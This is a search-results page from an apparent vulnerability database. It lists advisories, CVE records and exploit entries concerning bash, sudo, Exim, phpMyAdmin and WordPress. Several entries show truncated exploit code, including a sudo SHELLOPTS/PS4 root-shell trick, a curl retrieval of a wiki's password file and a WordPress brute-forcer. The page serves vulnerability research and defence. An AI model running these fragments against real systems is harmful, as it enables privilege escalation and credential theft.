Lucene search
+L

304 matches found

Tenable Nessus
Tenable Nessus
added 2010/07/30 12:00 a.m.18 views

MDVA-2010:012 : kdebase4

In kde4.3 this is not possible to execute a bash script when double clicking on it. This update fixes this issue. %NASLMINLEVEL 70300 @DEPRECATED@ This script has been deprecated as the associated patch is not currently a security fix. Disabled on 2012/09/06. C Tenable Network Security, Inc. This...

7.2AI score
SaveExploits0References1
FreeBSD
FreeBSD
added 2010/06/02 12:00 a.m.25 views

sudo -- Secure path vulnerability

Todd Miller reports: Most versions of the C library function getenv return the first instance of an environment variable to the caller. However, some programs, notably the GNU Bourne Again SHell bash, do their own environment parsing and may choose the last instance of a variable rather than the...

6.2CVSS6.5AI score0.00457EPSS
SaveExploits1References1
OpenVAS
OpenVAS
added 2010/03/12 12:00 a.m.22 views

Fedora Update for bournal FEDORA-2010-3221

Check for the Version of bournal OpenVAS Vulnerability Test Fedora Update for bournal FEDORA-2010-3221 Authors: System Generated Check Copyright: Copyright c 2010 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the...

3.3CVSS6.4AI score0.00348EPSS
SaveExploits0References2
securityvulns
securityvulns
added 2010/02/25 12:00 a.m.56 views

Secunia Research: Bournal ccrypt Information Disclosure Security Issue

====================================================================== Secunia Research 22/02/2010 - Bournal ccrypt Information Disclosure Security Issue - ====================================================================== Table of Contents Affected...

2.1CVSS0.3AI score0.00348EPSS
SaveExploits0
Packet Storm
Packet Storm
added 2009/07/24 12:00 a.m.33 views

WordPress 2.8.1 Cross Site Scripting

!/bin/bash echo "wp281.quickprz // iso^kpsbr" SITE=$1 COMMENT=$2 MESSAGE="h4x0riZed by the superfreakaz0rz" if "X$SITE" = "X" ; then echo "$0 postID" echo "f.e. $0 www.worstpress.eu" exit fi if "X$POSTID" = "X" ; then POSTID=1 fi echo "+ building payload" WHERE="title" can also be 'content'...

SaveExploits0
Exploit DB
Exploit DB
added 2009/06/09 12:00 a.m.302 views

phpMyAdmin - '/scripts/setup.php' PHP Code Injection

!/bin/bash CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11 by pagvac gnucitizen.org, 4th June 2009. special thanks to Greg Ose labs.neohapsis.com for discovering such a cool vuln, and to str0ke milw0rm.com for testing this PoC script and providing feedback! PoC...

9.8CVSS7.2AI score0.95438EPSS
SaveExploits17
Exploit DB
Exploit DB
added 2008/12/12 12:00 a.m.39 views

Wysi Wiki Wyg 1.0 - Remote Password Retrieve

!/bin/bash Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit by athos - stakerathotmaildotit host=$1; name=$2; path='/config/passwd.txt'; if "$name" = "" ; then echo "Usage: bash $0 host/path filename"; echo "by athos - stakerathotmaildotit"; exit; fi; curl $host/$path $name; clear cat $name;...

5.8AI score
SaveExploits0
Packet Storm
Packet Storm
added 2008/09/17 12:00 a.m.27 views

wp-bruteforcer.txt

!/usr/bin/env bash wordpress BruteForce v1.0 coded By 0x90 2008 0x90atbsdmail.org I do not take any reponsibilty for what you do with this tool Hopefully it will make your life easier rather then making other peoples lives more difficult! echo ".::Wordpress BruteForce By 0x90::." echo "use a good...

7.4AI score
SaveExploits0
myhack58
myhack58
added 2008/09/14 12:00 a.m.15 views

Provide the right to use a skills-vulnerability warning-the black bar safety net

Author: xi4oyu A linux mention of the right to use the tips, release to full when looking for a job to save RP. OK, under normal circumstances, we in the implementation of the bash script, there is an implementation process in which there is a little more important:if BASHENV is set, it will...

7.3AI score
SaveExploits0
OpenVAS
OpenVAS
added 2008/09/04 12:00 a.m.24 views

FreeBSD Ports: sudo

The remote host is missing an update to the system as announced in the referenced advisory. VID 1b725079-9ef6-11da-b410-000e0c2e438a OpenVAS Vulnerability Test $ Description: Auto generated from vuxml or freebsd advisories Authors: Thomas Reinke Copyright: Copyright c 2008 E-Soft Inc...

4.6CVSS8AI score0.00624EPSS
SaveExploits2
Packet Storm
Packet Storm
added 2007/12/18 12:00 a.m.29 views

dlink.txt

!/bin/bash Coded Bt Ph3mt Of K-Security Team This Code is private, pls do not redistribute Release Date 25/11/2007 Code function dow echo 'POST /cgi-bin/firmwarecfg HTTP/1.1' richiesta echo 'Host: $IP' richiesta echo 'User-Agent: veryprivateacsor' richiesta echo 'Accept:...

7.4AI score
SaveExploits0
zdt
zdt
added 2005/11/09 12:00 a.m.42 views

Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit

Exploit for linux platform in category local exploits ================================================================ Sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! % ls...

6.8AI score
SaveExploits0
exploitpack
exploitpack
added 2005/11/09 12:00 a.m.17 views

Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation

Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation Sudo local root escalation privilege vuln versions : sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! %...

1.4AI score
SaveExploits0
UbuntuCve
UbuntuCve
added 2005/10/25 4:02 p.m.26 views

CVE-2005-2959

Incomplete blacklist vulnerability in sudo 1.6.8 and earlier allows local users to gain privileges via the 1 SHELLOPTS and 2 PS4 environment variables before executing a bash script on behalf of another user, which are not cleared even though other variables are...

4.6CVSS5.9AI score0.00624EPSS
SaveExploits2References2
CVE
CVE
added 2005/10/25 4:00 a.m.83 views

CVE-2005-2959

CVE-2005-2959 concerns sudo 1.6.8 and earlier, where the SHELLOPTS and PS4 environment variables are not cleared during privilege-escalation prompts. The result is a local privilege escalation when a user with limited sudo privileges runs a bash script, as these variables can be passed through to...

4.6CVSS7.9AI score0.00624EPSS
SaveExploits2References19Affected Software1
NVD
NVD
added 2005/03/01 5:00 a.m.20 views

CVE-2004-1051

sudo before 1.6.8p2 allows local users to execute arbitrary commands by using "" style environment variables to create functions that have the same name as any program within the bash script that is called without using the program's full pathname...

7.2CVSS7AI score0.01374EPSS
SaveExploits0References10
OSV
OSV
added 2005/03/01 5:00 a.m.11 views

CVE-2004-1051

sudo before 1.6.8p2 allows local users to execute arbitrary commands by using "" style environment variables to create functions that have the same name as any program within the bash script that is called without using the program's full pathname...

6.9AI score
SaveExploits0References11
UbuntuCve
UbuntuCve
added 2005/03/01 5:00 a.m.37 views

CVE-2004-1051

sudo before 1.6.8p2 allows local users to execute arbitrary commands by using "" style environment variables to create functions that have the same name as any program within the bash script that is called without using the program's full pathname...

7.2CVSS6.2AI score0.01374EPSS
SaveExploits0References1
OSV
OSV
added 2005/03/01 5:00 a.m.8 views

DEBIAN-CVE-2004-1051

sudo before 1.6.8p2 allows local users to execute arbitrary commands by using "" style environment variables to create functions that have the same name as any program within the bash script that is called without using the program's full pathname...

7.2CVSS7.4AI score0.01374EPSS
SaveExploits0References1
exploitpack
exploitpack
added 2005/02/07 12:00 a.m.18 views

Exim 4.42 - Local Privilege Escalation

Exim 4.42 - Local Privilege Escalation !/bin/sh Local Lame R00T sploit for exim include int mainint argc, char argv char addrptr; addrptr = getenvargv1; printf"%s @ %p\n", argv1, addrptr; return 0; gcc @env.c -o @env cp @env /usr/bin cd /usr/exim/bin CODE=perl -e 'print...

0.8AI score
SaveExploits0
Rows per page
Query Builder